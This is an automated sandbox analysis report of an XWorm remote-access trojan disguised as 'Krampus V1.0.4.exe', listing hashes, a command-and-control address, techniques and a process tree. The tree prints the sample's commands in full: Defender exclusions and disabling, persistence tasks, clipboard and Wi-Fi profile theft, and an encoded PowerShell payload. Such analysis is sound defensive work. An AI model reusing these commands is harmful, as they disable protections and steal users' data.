xworm | 49a99b879ee536694b0384a06d5535a292828eea2309399d43b62f85e1feff23

Analysis

max time kernel
17s
max time network
28s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
18-04-2024 20:14

Sharing

Reason

Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-18T20:15:13Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win10v2004-20240412-en/instance_19-dirty.qcow2\"}"

Report Analysis Logs

General

Target

Krampus V1.0.4.exe
Size

7.4MB
MD5

9cf96ea02d842bd21b1b36369cfe21cd
SHA1

ffa7cd5689ffbe68ef28655f5a1568d3aec68141
SHA256

49a99b879ee536694b0384a06d5535a292828eea2309399d43b62f85e1feff23
SHA512

96aea5fa0105472285b8e51d007ca4b80cca60eaf47701c298c13474d643ad2c279a4d08cc1ff97e9470fe07d1af8a01778611f1b4f8bf428b9c3ab7254a7697
SSDEEP

98304:3Sc0SbSMt+dnz8JjHWxJHRLIHzcrmpliRYOeTjcIJ1IlhlWu8hK87N7Ceg6H09Bi:6Mt+dnIdHWxdKHoYOeXRihlWu8YgoPS

Score

10^/10

xworm persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

country-depend.gl.at.ply.gg:38853

Attributes

Install_directory
%Userprofile%
install_file
discord.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000900000002340b-43.dat	family_xworm
behavioral1/memory/3204-51-0x0000000000E40000-0x0000000000E6A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Krampus V1.0.4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	Discord.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk	Discord.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk	Discord.exe

Executes dropped EXE 4 IoCs

pid	Process
3204	Discord.exe
3420	Built.exe
3800	Built.exe
5264	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe
3800	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023421-107.dat	upx
behavioral1/memory/3800-111-0x00007FF907910000-0x00007FF907F00000-memory.dmp	upx
behavioral1/files/0x0007000000023414-113.dat	upx
behavioral1/files/0x000700000002341f-116.dat	upx
behavioral1/files/0x000700000002341b-132.dat	upx
behavioral1/memory/3800-134-0x00007FF924320000-0x00007FF92432F000-memory.dmp	upx
behavioral1/memory/3800-133-0x00007FF91E780000-0x00007FF91E7A4000-memory.dmp	upx
behavioral1/files/0x000700000002341a-131.dat	upx
behavioral1/files/0x0007000000023419-130.dat	upx
behavioral1/files/0x0007000000023418-129.dat	upx
behavioral1/files/0x0007000000023417-128.dat	upx
behavioral1/files/0x0007000000023416-127.dat	upx
behavioral1/files/0x0007000000023415-126.dat	upx
behavioral1/files/0x0007000000023413-125.dat	upx
behavioral1/files/0x0007000000023426-124.dat	upx
behavioral1/files/0x0007000000023425-123.dat	upx
behavioral1/files/0x0007000000023424-122.dat	upx
behavioral1/files/0x0007000000023420-119.dat	upx
behavioral1/files/0x000700000002341e-118.dat	upx
behavioral1/memory/3800-143-0x00007FF91E300000-0x00007FF91E319000-memory.dmp	upx
behavioral1/memory/3800-144-0x00007FF91CC70000-0x00007FF91CC93000-memory.dmp	upx
behavioral1/memory/3800-141-0x00007FF91CCA0000-0x00007FF91CCCD000-memory.dmp	upx
behavioral1/memory/3800-149-0x00007FF91CC30000-0x00007FF91CC49000-memory.dmp	upx
behavioral1/memory/3800-147-0x00007FF90D890000-0x00007FF90DA06000-memory.dmp	upx
behavioral1/memory/3800-151-0x00007FF91CC60000-0x00007FF91CC6D000-memory.dmp	upx
behavioral1/memory/3800-153-0x00007FF91CAB0000-0x00007FF91CAE3000-memory.dmp	upx
behavioral1/memory/3800-157-0x00007FF907910000-0x00007FF907F00000-memory.dmp	upx
behavioral1/memory/3800-158-0x00007FF90D7C0000-0x00007FF90D88D000-memory.dmp	upx
behavioral1/memory/3800-162-0x00007FF91CB80000-0x00007FF91CB8D000-memory.dmp	upx
behavioral1/memory/3800-167-0x00007FF908600000-0x00007FF908B29000-memory.dmp	upx
behavioral1/memory/3800-168-0x00007FF91CA90000-0x00007FF91CAA4000-memory.dmp	upx
behavioral1/memory/3800-169-0x00007FF90D6A0000-0x00007FF90D7BC000-memory.dmp	upx
behavioral1/memory/3800-170-0x00007FF91E780000-0x00007FF91E7A4000-memory.dmp	upx
behavioral1/memory/3800-277-0x00007FF91CC70000-0x00007FF91CC93000-memory.dmp	upx
behavioral1/memory/3800-301-0x00007FF91CC30000-0x00007FF91CC49000-memory.dmp	upx
behavioral1/memory/3800-305-0x00007FF91CAB0000-0x00007FF91CAE3000-memory.dmp	upx
behavioral1/memory/3800-480-0x00007FF907910000-0x00007FF907F00000-memory.dmp	upx
behavioral1/memory/3800-481-0x00007FF91E780000-0x00007FF91E7A4000-memory.dmp	upx
behavioral1/memory/3800-495-0x00007FF90D890000-0x00007FF90DA06000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord.exe"	Krampus V1.0.4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\ProgramData\\Built.exe"	Krampus V1.0.4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\discord.exe"	Discord.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\test = "C:\\ProgramData\\test.bat"	Krampus V1.0.4.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
46	discord.com
47	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com
44	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4844	schtasks.exe
1164	schtasks.exe
5272	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3328	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
1472	tasklist.exe
2644	tasklist.exe
4392	tasklist.exe
5124	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3488	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4640	Krampus V1.0.4.exe
4008	powershell.exe
4008	powershell.exe
3732	powershell.exe
3732	powershell.exe
3732	powershell.exe
2792	powershell.exe
2792	powershell.exe
4012	powershell.exe
4012	powershell.exe
464	powershell.exe
464	powershell.exe
976	powershell.exe
976	powershell.exe
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
464	powershell.exe
464	powershell.exe
4012	powershell.exe
4012	powershell.exe
316	powershell.exe
316	powershell.exe
976	powershell.exe
976	powershell.exe
316	powershell.exe
5548	powershell.exe
5548	powershell.exe
5548	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
5480	powershell.exe
5480	powershell.exe
5480	powershell.exe
5452	powershell.exe
5452	powershell.exe
5452	powershell.exe
5552	powershell.exe
5552	powershell.exe
5552	powershell.exe
5296	powershell.exe
5296	powershell.exe
5296	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4640	Krampus V1.0.4.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	3204	Discord.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	1472	tasklist.exe
Token: SeDebugPrivilege	2644	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeSecurityPrivilege	3052	WMIC.exe
Token: SeTakeOwnershipPrivilege	3052	WMIC.exe
Token: SeLoadDriverPrivilege	3052	WMIC.exe
Token: SeSystemProfilePrivilege	3052	WMIC.exe
Token: SeSystemtimePrivilege	3052	WMIC.exe
Token: SeProfSingleProcessPrivilege	3052	WMIC.exe
Token: SeIncBasePriorityPrivilege	3052	WMIC.exe
Token: SeCreatePagefilePrivilege	3052	WMIC.exe
Token: SeBackupPrivilege	3052	WMIC.exe
Token: SeRestorePrivilege	3052	WMIC.exe
Token: SeShutdownPrivilege	3052	WMIC.exe
Token: SeDebugPrivilege	3052	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3052	WMIC.exe
Token: SeRemoteShutdownPrivilege	3052	WMIC.exe
Token: SeUndockPrivilege	3052	WMIC.exe
Token: SeManageVolumePrivilege	3052	WMIC.exe
Token: 33	3052	WMIC.exe
Token: 34	3052	WMIC.exe
Token: 35	3052	WMIC.exe
Token: 36	3052	WMIC.exe
Token: SeDebugPrivilege	4392	tasklist.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeIncreaseQuotaPrivilege	3052	WMIC.exe
Token: SeSecurityPrivilege	3052	WMIC.exe
Token: SeTakeOwnershipPrivilege	3052	WMIC.exe
Token: SeLoadDriverPrivilege	3052	WMIC.exe
Token: SeSystemProfilePrivilege	3052	WMIC.exe
Token: SeSystemtimePrivilege	3052	WMIC.exe
Token: SeProfSingleProcessPrivilege	3052	WMIC.exe
Token: SeIncBasePriorityPrivilege	3052	WMIC.exe
Token: SeCreatePagefilePrivilege	3052	WMIC.exe
Token: SeBackupPrivilege	3052	WMIC.exe
Token: SeRestorePrivilege	3052	WMIC.exe
Token: SeShutdownPrivilege	3052	WMIC.exe
Token: SeDebugPrivilege	3052	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3052	WMIC.exe
Token: SeRemoteShutdownPrivilege	3052	WMIC.exe
Token: SeUndockPrivilege	3052	WMIC.exe
Token: SeManageVolumePrivilege	3052	WMIC.exe
Token: 33	3052	WMIC.exe
Token: 34	3052	WMIC.exe
Token: 35	3052	WMIC.exe
Token: 36	3052	WMIC.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	5548	powershell.exe
Token: SeDebugPrivilege	5124	tasklist.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	5480	powershell.exe
Token: SeDebugPrivilege	5452	powershell.exe
Token: SeDebugPrivilege	5552	powershell.exe
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1144	WMIC.exe
Token: SeSecurityPrivilege	1144	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3204	Discord.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4640 wrote to memory of 4008	4640	Krampus V1.0.4.exe	89
PID 4640 wrote to memory of 4008	4640	Krampus V1.0.4.exe	89
PID 4640 wrote to memory of 3988	4640	Krampus V1.0.4.exe	93
PID 4640 wrote to memory of 3988	4640	Krampus V1.0.4.exe	93
PID 4640 wrote to memory of 3732	4640	Krampus V1.0.4.exe	95
PID 4640 wrote to memory of 3732	4640	Krampus V1.0.4.exe	95
PID 4640 wrote to memory of 4844	4640	Krampus V1.0.4.exe	97
PID 4640 wrote to memory of 4844	4640	Krampus V1.0.4.exe	97
PID 4640 wrote to memory of 3204	4640	Krampus V1.0.4.exe	99
PID 4640 wrote to memory of 3204	4640	Krampus V1.0.4.exe	99
PID 4640 wrote to memory of 2792	4640	Krampus V1.0.4.exe	100
PID 4640 wrote to memory of 2792	4640	Krampus V1.0.4.exe	100
PID 4640 wrote to memory of 1164	4640	Krampus V1.0.4.exe	102
PID 4640 wrote to memory of 1164	4640	Krampus V1.0.4.exe	102
PID 4640 wrote to memory of 3420	4640	Krampus V1.0.4.exe	104
PID 4640 wrote to memory of 3420	4640	Krampus V1.0.4.exe	104
PID 3420 wrote to memory of 3800	3420	Built.exe	105
PID 3420 wrote to memory of 3800	3420	Built.exe	105
PID 3800 wrote to memory of 4560	3800	Built.exe	106
PID 3800 wrote to memory of 4560	3800	Built.exe	106
PID 3800 wrote to memory of 3900	3800	Built.exe	107
PID 3800 wrote to memory of 3900	3800	Built.exe	107
PID 3800 wrote to memory of 5000	3800	Built.exe	108
PID 3800 wrote to memory of 5000	3800	Built.exe	108
PID 3800 wrote to memory of 5036	3800	Built.exe	112
PID 3800 wrote to memory of 5036	3800	Built.exe	112
PID 3800 wrote to memory of 4800	3800	Built.exe	113
PID 3800 wrote to memory of 4800	3800	Built.exe	113
PID 4560 wrote to memory of 464	4560	cmd.exe	116
PID 4560 wrote to memory of 464	4560	cmd.exe	116
PID 3900 wrote to memory of 4012	3900	cmd.exe	117
PID 3900 wrote to memory of 4012	3900	cmd.exe	117
PID 5000 wrote to memory of 976	5000	cmd.exe	118
PID 5000 wrote to memory of 976	5000	cmd.exe	118
PID 3800 wrote to memory of 1908	3800	Built.exe	174
PID 3800 wrote to memory of 1908	3800	Built.exe	174
PID 3800 wrote to memory of 4232	3800	Built.exe	120
PID 3800 wrote to memory of 4232	3800	Built.exe	120
PID 5036 wrote to memory of 1472	5036	cmd.exe	122
PID 5036 wrote to memory of 1472	5036	cmd.exe	122
PID 3800 wrote to memory of 1668	3800	Built.exe	123
PID 3800 wrote to memory of 1668	3800	Built.exe	123
PID 3800 wrote to memory of 1216	3800	Built.exe	125
PID 3800 wrote to memory of 1216	3800	Built.exe	125
PID 3800 wrote to memory of 4568	3800	Built.exe	127
PID 3800 wrote to memory of 4568	3800	Built.exe	127
PID 3800 wrote to memory of 224	3800	Built.exe	131
PID 3800 wrote to memory of 224	3800	Built.exe	131
PID 3800 wrote to memory of 1476	3800	Built.exe	128
PID 3800 wrote to memory of 1476	3800	Built.exe	128
PID 3800 wrote to memory of 2372	3800	Built.exe	132
PID 3800 wrote to memory of 2372	3800	Built.exe	132
PID 4800 wrote to memory of 2644	4800	cmd.exe	135
PID 4800 wrote to memory of 2644	4800	cmd.exe	135
PID 1908 wrote to memory of 3052	1908	cmd.exe	137
PID 1908 wrote to memory of 3052	1908	cmd.exe	137
PID 4232 wrote to memory of 1864	4232	cmd.exe	138
PID 4232 wrote to memory of 1864	4232	cmd.exe	138
PID 1668 wrote to memory of 4392	1668	cmd.exe	139
PID 1668 wrote to memory of 4392	1668	cmd.exe	139
PID 224 wrote to memory of 4944	224	cmd.exe	140
PID 224 wrote to memory of 4944	224	cmd.exe	140
PID 1476 wrote to memory of 3488	1476	cmd.exe	141
PID 1476 wrote to memory of 3488	1476	cmd.exe	141

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5596	attrib.exe
5916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Krampus V1.0.4.exe
"C:\Users\Admin\AppData\Local\Temp\Krampus V1.0.4.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\test.bat'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\test.bat" "
  2⤵
  PID:3988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Discord" /SC ONLOGON /TR "C:\ProgramData\Discord.exe" /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:4844
- C:\ProgramData\Discord.exe
  "C:\ProgramData\Discord.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\discord.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5296
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\discord.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Built.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2792
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\ProgramData\Built.exe" /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:1164
- C:\ProgramData\Built.exe
  "C:\ProgramData\Built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3420
- - C:\ProgramData\Built.exe
    "C:\ProgramData\Built.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Built.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Built.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3900
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5036
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4800
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1668
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1216
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      PID:4568
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        
        PID:4420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:224
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAI